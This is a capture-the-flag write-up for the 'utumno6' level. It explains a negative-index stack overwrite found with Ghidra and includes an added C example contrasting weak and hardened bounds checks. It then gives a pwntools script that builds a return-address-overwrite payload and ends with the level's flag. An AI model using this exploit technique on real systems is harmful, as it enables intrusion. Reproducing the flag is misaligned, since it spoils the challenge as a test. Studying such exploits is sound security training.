utumno6 | Avishai’s CTF Writeups

First I took the binary and decompiled it with Ghidra. I can see an integer overflow: the program accepts a negative value, which lets us go backwards in memory.

The idea behind the attack is to overwrite the location where the return address is stored and put our shellcode address there.

We can see that the address of auStack_34 is located at [ebp-0x34], so if we set arg1 = -1 we can overwrite that address. Then we need to find where on the stack the return address is stored; that memory location becomes the new address of our auStack_34.
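To make the bounds-check failure concrete, here is an added example of my own; it is not the challenge's source and not the author's code. It models a frame where a pointer-sized slot sits just below a 16-byte buffer, and compares a weak check that only tests the upper bound on a signed index (so -1 passes, as the writeup exploits) against a hardened check that rejects negatives and uses a strict bound. The struct layout, `BUFSIZE`, and the function names are assumptions for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 16

/* Constructed model of the frame the writeup describes: a pointer-sized slot
 * sits immediately below the buffer. Illustration only, not the challenge's
 * real stack layout or source. */
typedef struct {
    unsigned char slot_below[4];   /* models a saved pointer at buf - 4 */
    unsigned char buf[BUFSIZE];
} frame_t;

/* Weak check (hypothetical): only the upper bound is tested on a signed int,
 * so -1 passes, and n == BUFSIZE (one past the end) passes as well. */
bool weak_index_ok(int n) { return n <= BUFSIZE; }

/* Hardened check: reject negative indices and use a strict upper bound. */
bool safe_index_ok(int n) { return n >= 0 && n < BUFSIZE; }

/* Write one byte at buf[n] if the supplied check accepts n.
 * The address is computed from the start of the struct so that a negative n
 * down to -4 stays inside the frame_t object (no undefined behaviour in this
 * model; the weak check must not be exercised with n >= BUFSIZE here).
 * Returns 1 if the write happened, 0 if the check rejected it. */
int checked_write(frame_t *f, bool (*ok)(int), int n, unsigned char v) {
    if (!ok(n)) return 0;
    unsigned char *base = (unsigned char *)f + offsetof(frame_t, buf);
    base[n] = v;
    return 1;
}

/* Returns true when a write with index n under the given check lands on
 * slot_below, i.e. corrupts the pointer stored just before the buffer. */
bool write_corrupts_slot(bool (*ok)(int), int n) {
    frame_t f;
    memset(&f, 0, sizeof f);
    checked_write(&f, ok, n, 0x41);
    for (size_t i = 0; i < sizeof f.slot_below; i++)
        if (f.slot_below[i] != 0) return true;
    return false;
}

int main(void) {
    printf("weak check, n=-1 corrupts slot: %d\n", write_corrupts_slot(weak_index_ok, -1));
    printf("safe check, n=-1 corrupts slot: %d\n", write_corrupts_slot(safe_index_ok, -1));
    printf("n=BUFSIZE accepted: weak=%d safe=%d\n",
           weak_index_ok(BUFSIZE), safe_index_ok(BUFSIZE));
    return 0;
}
```

With the weak check, index -1 lands on the byte just below the buffer, which is exactly the "go backwards in memory" primitive the writeup uses to redirect the pointer; the hardened check refuses it and also closes the off-by-one at n == BUFSIZE.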

import sys
from pwn import *

# Stack addresses read from the debugging session above; they are specific to
# that environment and must be re-read if the stack layout shifts.
buffer_address = 0xffffd2cc     # stack slot holding the return address (new address for auStack_34)
shellcode_address = 0xffffd53c  # where the shellcode sits

arg1 = -1                  # negative value: the write goes backwards in memory, onto the auStack_34 pointer
arg2 = buffer_address      # new pointer value, passed as a hex string
arg3 = shellcode_address   # raw 4-byte little-endian value written through the pointer (32-bit target)

payload = str(arg1).encode() + b' ' + hex(arg2).encode() + b' ' + p32(arg3)

# write raw bytes, not text, so the packed address is not mangled
sys.stdout.buffer.write(payload)


Flag: VHOuCx7iA5